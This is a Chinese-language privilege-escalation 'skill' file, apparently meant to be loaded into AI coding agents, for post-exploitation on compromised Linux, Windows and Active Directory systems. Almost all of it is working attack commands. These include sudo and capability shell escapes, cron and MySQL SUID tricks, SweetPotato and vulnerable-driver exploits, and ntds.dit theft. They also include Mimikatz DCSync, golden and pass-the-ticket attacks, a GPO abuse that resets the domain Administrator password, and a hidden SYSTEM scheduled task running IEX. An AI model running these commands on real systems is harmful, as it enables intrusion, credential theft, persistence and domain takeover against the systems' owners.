关于
在已入侵的 Linux 和 Windows 系统上从低权限用户提升到 root/管理员权限的全面技术。用于渗透测试后利用阶段和红队行动。
name: privilege-escalation-methods description: "提供从低权限用户提升到 root/管理员权限的全面技术,适用于已入侵的 Linux 和 Windows 系统。对渗透测试后利用阶段和红队操作至关重要。" risk: unknown source: community author: zebbern date_added: "2026-02-27"
权限提升方法
目的
提供从低权限用户提升到 root/管理员权限的全面技术,适用于已入侵的 Linux 和 Windows 系统。对渗透测试后利用阶段和红队操作至关重要。
输入/前提条件
- 目标系统上的初始低权限 shell 访问
- Kali Linux 或渗透测试发行版
- 工具:Mimikatz、PowerView、PowerUpSQL、Responder、Impacket、Rubeus
- 了解 Windows/Linux 权限模型
- AD 攻击需要:域用户凭据和到 DC 的网络访问
输出/交付物
- Root 或管理员 shell 访问
- 提取的凭据和哈希
- 持久化访问机制
- 域控制(AD 环境)
核心技术
Linux 权限提升
1. 滥用 Sudo 二进制文件
利用配置错误的 sudo 权限,使用 GTFOBins 技术:
# 检查 sudo 权限
sudo -l
# 利用常见二进制文件
sudo vim -c ':!/bin/bash'
sudo find /etc/passwd -exec /bin/bash ;
sudo awk 'BEGIN {system("/bin/bash")}'
sudo python -c 'import pty;pty.spawn("/bin/bash")'
sudo perl -e 'exec "/bin/bash";'
sudo less /etc/hosts # 然后输入:!bash
sudo man man # 然后输入:!bash
sudo env /bin/bash
2. 滥用计划任务(Cron)
# 查找可写的 cron 脚本
ls -la /etc/cron*
cat /etc/crontab
# 向可写脚本注入载荷
echo 'chmod +s /bin/bash' > /home/user/systemupdate.sh
chmod +x /home/user/systemupdate.sh
# 等待执行,然后:
/bin/bash -p
3. 滥用 Capabilities
# 查找具有 capabilities 的二进制文件
getcap -r / 2>/dev/null
# 具有 cap_setuid 的 Python
/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
# 具有 cap_setuid 的 Perl
/usr/bin/perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'
# 具有 cap_dac_read_search 的 Tar(读取任意文件)
/usr/bin/tar -cvf key.tar /root/.ssh/id_rsa
/usr/bin/tar -xvf key.tar
4. NFS Root Squashing
# 检查 NFS 共享
showmount -e <victim_ip>
# 挂载并利用 no_root_squash
mkdir /tmp/mount
mount -o rw,vers=2 <victim_ip>:/tmp /tmp/mount
cd /tmp/mount
cp /bin/bash .
chmod +s bash
5. MySQL 以 Root 运行
# 如果 MySQL 以 root 运行
mysql -u root -p
\! chmod +s /bin/bash
exit
/bin/bash -p
Windows 权限提升
1. 令牌模拟
# 使用 SweetPotato(SeImpersonatePrivilege)
execute-assembly sweetpotato.exe -p beacon.exe
# 使用 SharpImpersonation
SharpImpersonation.exe user:<user> technique:ImpersonateLoggedOnuser
2. 服务滥用
# 使用 PowerUp
. .\PowerUp.ps1
Invoke-ServiceAbuse -Name 'vds' -UserName 'domain\user1'
Invoke-ServiceAbuse -Name 'browser' -UserName 'domain\user1'
3. 滥用 SeBackupPrivilege
import-module .\SeBackupPrivilegeUtils.dll
import-module .\SeBackupPrivilegeCmdLets.dll
Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\temp\ntds.dit
4. 滥用 SeLoadDriverPrivilege
# 加载有漏洞的 Capcom 驱动
.\eoploaddriver.exe System\CurrentControlSet\MyService C:\test\capcom.sys
.\ExploitCapcom.exe
5. 滥用 GPO
.\SharpGPOAbuse.exe --AddComputerTask --Taskname "Update" `
--Author DOMAIN\<USER> --Command "cmd.exe" `
--Arguments "/c net user Administrator Password!@# /domain" `
--GPOName "ADDITIONAL DC CONFIGURATION"
Active Directory 攻击
1. Kerberoasting
# 使用 Impacket
GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.100 -request
# 使用 CrackMapExec
crackmapexec ldap 10.0.2.11 -u 'user' -p 'pass' --kdcHost 10.0.2.11 --kerberoast output.txt
2. AS-REP Roasting
.\Rubeus.exe asreproast
3. 黄金票据
# DCSync 获取 krbtgt 哈希
mimikatz# lsadump::dcsync /user:krbtgt
# 创建黄金票据
mimikatz# kerberos::golden /user:Administrator /domain:domain.local `
/sid:S-1-5-21-... /rc4:<NTLM_HASH> /id:500
4. 票据传递
.\Rubeus.exe asktgt /user:USER$ /rc4:<NTLM_HASH> /ptt
klist # 验证票据
5. 黄金票据配合计划任务
# 1. 提升权限并转储凭据
mimikatz# token::elevate
mimikatz# vault::cred /patch
mimikatz# lsadump::lsa /patch
# 2. 创建黄金票据
mimikatz# kerberos::golden /user:Administrator /rc4:<HASH> `
/domain:DOMAIN /sid:<SID> /ticket:ticket.kirbi
# 3. 创建计划任务
schtasks /create /S DOMAIN /SC Weekly /RU "NT Authority\SYSTEM" `
/TN "enterprise" /TR "powershell.exe -nop -w hidden -c IEX(...)"
兼容工具
Claude CodeCursor
标签
安全
